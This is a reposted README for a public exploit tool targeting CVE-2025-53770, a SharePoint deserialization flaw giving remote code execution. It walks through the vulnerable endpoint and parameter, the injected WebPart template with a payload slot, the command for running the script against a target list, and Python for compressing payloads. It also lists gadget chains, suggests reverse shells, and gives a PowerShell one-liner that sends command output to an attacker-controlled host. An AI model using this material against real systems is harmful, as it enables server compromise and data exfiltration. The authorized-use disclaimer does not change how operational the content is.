Skip to content Dark Web Informer - Cyber Threat Intelligence

CVE-2025-53770: SharePoint WebPart Injection Exploit Tool


GitHub: https://github.com/soltanali0/CVE-2025-53770-Exploit


🍕 Exploit tool for SharePoint WebPart Injection via ToolPane.aspx, leading to .NET deserialization and remote code execution (RCE).

Developed by: @GOTOCVE


🌍 Overview

This tool exploits a vulnerability in Microsoft SharePoint (on-premises) that allows authenticated users to abuse the ToolPane.aspx endpoint and inject malicious WebParts containing GZIP-compressed serialized .NET objects.

The vulnerability exists in the handling of the CompressedDataTable property inside the <Scorecard:ExcelDataSet> WebPart. This results in unsafe deserialization using formatters like BinaryFormatter or LosFormatter, enabling arbitrary code execution on the SharePoint server.


⚡ Vulnerability Summary

FieldValue
ComponentMicrosoft SharePoint (on-premises)
Endpoint/layouts/15/ToolPane.aspx
ParameterMSOTlPn_DWP
Injected Control<Scorecard:ExcelDataSet CompressedDataTable="...">
VulnerabilityInsecure deserialization (BinaryFormatter, LosFormatter, etc.)
CVECVE-2025-53770

🧰 How It Works

  1. Authenticated attacker sends a POST request to:

/_layouts/15/ToolPane.aspx?DisplayMode=Edit

  1. The request includes the parameter MSOTlPn_DWP, containing an injected WebPart XML.
  2. Inside the WebPart, the attacker places a <Scorecard:ExcelDataSet> component with the CompressedDataTable attribute holding a payload:
  • Serialized .NET object
  • Encoded in Base64
  • Compressed using GZIP
  1. SharePoint automatically inflates and deserializes the object using unsafe formatters.
  2. If the object contains a valid gadget chain (e.g., ObjectDataProvider), arbitrary code is executed on the server.

🔧 Requirements

  • Python 3.x
  • Required Python modules:

pip install -r requirements.txt

  • A Base64 GZIP-compressed .NET deserialization payload (see next section)

📂 Example Usage

python3 exploit.py -t targets.txt --file payload.txt --proxy http://127.0.0.1:8080

Arguments:

ArgumentDescription
-t / --targetsFile containing SharePoint target URLs (one per line)
--fileFile containing the base64 GZIP-compressed payload
--proxy(Optional) Burp/ZAP proxy for interception/debugging

💥 Payload Structure

The payload must be:

  • .NET DataSet or similar gadget chain
  • Serialized using LosFormatter or BinaryFormatter
  • Base64-encoded
  • GZIP-compressed
  • Embedded inside this WebPart structure:

<asp:UpdateProgress ID="UpdateProgress1" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="{PAYLOAD}" DataTable-CaseSensitive="false" runat="server" />
</div>
</ProgressTemplate>
</asp:UpdateProgress>


Generating Payloads

✅ Step 1: Generate the base64 serialized object

LosFormatter is a specialized formatter in ASP.NET, commonly used in contexts like CompressedDataTable — which is exactly what SharePoint uses inside its WebParts. I'm currently working on building a tool similar to ysoserial, tailored specifically for this case, to make the exploitation process easier for you.


✅ Step 2: Compress with GZIP

import gzip, base64

with open("payload.b64", "rb") as f:
decoded = base64.b64decode(f.read())
compressed = gzip.compress(decoded)
print(base64.b64encode(compressed).decode())

Save the final output into payload.txt — this is what you give to the exploit script.

🧵 Compatible Gadget Chains

You can use any gadget chain supported by your serialization tool. Common examples include:

  • System.Data.DataSet
  • System.Data.Services.Internal.ExpandedWrapper
  • System.Web.UI.LosFormatter
  • System.Windows.Data.ObjectDataProvider

📡 Notes on Output / Echo

This vulnerability does not return command output like ipconfig in the HTTP response. If you want output:

  • Use reverse shell payloads
  • Or redirect output via Invoke-WebRequest:

powershell -c "ipconfig | Invoke-WebRequest -Uri http://your-ip:8000/?d=$(Get-Content -Raw)"


This tool is provided for educational and authorized security testing purposes only.

Do not use this tool against systems without explicit permission. Misuse may be illegal and unethical.


🌐 More CVEs & Deep Dives

📢 Join @GOTOCVE on Telegram for:

  • 🔍 Weekly CVE breakdowns
  • 🧠 In-depth exploit analysis
  • 🔴 Red & Blue Team detection tips
  • 📦 Real-world PoCs and threat simulations

Stay informed, stay sharp. ⚡

Latest